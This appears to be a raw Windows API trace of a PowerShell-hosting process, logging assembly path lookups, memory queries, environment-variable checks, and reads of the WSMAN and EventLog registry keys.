	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.589] VirtualQuery (in: lpAddress=0x29b3f0, lpBuffer=0x29c2b0, dwLength=0x30 | out: lpBuffer=0x29c2b0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.590] VirtualQuery (in: lpAddress=0x29b480, lpBuffer=0x29c340, dwLength=0x30 | out: lpBuffer=0x29c340*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.591] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.592] VirtualQuery (in: lpAddress=0x29bc00, lpBuffer=0x29cac0, dwLength=0x30 | out: lpBuffer=0x29cac0*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0178.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0178.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0179.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0179.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0179.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0180.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0180.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0191.892] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0191.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.892] CoTaskMemFree (pv=0x4be2b0) 
	[0191.894] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0191.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.894] CoTaskMemFree (pv=0x4be2b0) 
	[0191.895] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0191.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.895] CoTaskMemFree (pv=0x4be2b0) 
	[0191.896] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0191.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.896] CoTaskMemFree (pv=0x4be2b0) 
	[0192.284] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0192.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.284] CoTaskMemFree (pv=0x4be2b0) 
	[0192.707] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0192.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.707] CoTaskMemFree (pv=0x4be2b0) 
	[0192.709] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0192.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.709] CoTaskMemFree (pv=0x4be2b0) 
	[0193.154] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d3c8 | out: phkResult=0x29d3c8*=0x1c8) returned 0x0
	[0193.159] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d2cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d2c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d2cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d2c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0193.159] CoTaskMemFree (pv=0x0) 
	[0193.160] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0193.160] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0x46ba40, lpcchValueName=0x29d378, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x29d378, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0193.160] CoTaskMemFree (pv=0x46ba40) 
	[0193.160] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0193.160] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0x46ba40, lpcchValueName=0x29d378, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x29d378, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0193.160] CoTaskMemFree (pv=0x46ba40) 
	[0193.160] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0193.160] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0x46ba40, lpcchValueName=0x29d378, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x29d378, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0193.160] CoTaskMemFree (pv=0x46ba40) 
	[0193.161] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d35c, lpData=0x0, lpcbData=0x29d358*=0x0 | out: lpType=0x29d35c*=0x1, lpData=0x0, lpcbData=0x29d358*=0x8) returned 0x0
	[0193.161] CoTaskMemAlloc (cb=0xc) returned 0x1b841a90
	[0193.162] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d32c, lpData=0x1b841a90, lpcbData=0x29d328*=0x8 | out: lpType=0x29d32c*=0x1, lpData="2.0", lpcbData=0x29d328*=0x8) returned 0x0
	[0193.162] CoTaskMemFree (pv=0x1b841a90) 
	[0196.780] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d318 | out: phkResult=0x29d318*=0x1cc) returned 0x0
	[0196.780] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d21c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d218*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0196.780] CoTaskMemFree (pv=0x0) 
	[0196.780] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0196.780] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x0, lpValueName=0x46ba40, lpcchValueName=0x29d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x29d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0196.780] CoTaskMemFree (pv=0x46ba40) 
	[0196.780] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0196.780] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x1, lpValueName=0x46ba40, lpcchValueName=0x29d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x29d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0196.780] CoTaskMemFree (pv=0x46ba40) 
	[0196.780] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0196.780] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x2, lpValueName=0x46ba40, lpcchValueName=0x29d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x29d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0196.780] CoTaskMemFree (pv=0x46ba40) 
	[0196.780] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d2ac, lpData=0x0, lpcbData=0x29d2a8*=0x0 | out: lpType=0x29d2ac*=0x1, lpData=0x0, lpcbData=0x29d2a8*=0x8) returned 0x0
	[0196.780] CoTaskMemAlloc (cb=0xc) returned 0x1b8419b0
	[0196.780] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x29d27c, lpData=0x1b8419b0, lpcbData=0x29d278*=0x8 | out: lpType=0x29d27c*=0x1, lpData="2.0", lpcbData=0x29d278*=0x8) returned 0x0
	[0196.780] CoTaskMemFree (pv=0x1b8419b0) 
	[0196.782] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0196.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.782] CoTaskMemFree (pv=0x4be2b0) 
	[0196.786] CoTaskMemAlloc (cb=0x104) returned 0x4be2b0
	[0196.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be2b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.786] CoTaskMemFree (pv=0x4be2b0) 
	[0200.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d348 | out: phkResult=0x29d348*=0x324) returned 0x0
	[0200.602] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x29d2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x29d2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x29d2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.602] CoTaskMemFree (pv=0x0) 
	[0200.602] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.602] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
	[0200.603] CoTaskMemAlloc (cb=0x204) returned 0x46ba40
	[0200.603] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x46ba40, lpcchName=0x29d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x29d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.603] CoTaskMemFree (pv=0x46ba40) 
	[0200.603] CoTaskMemFree (pv=0x0) 
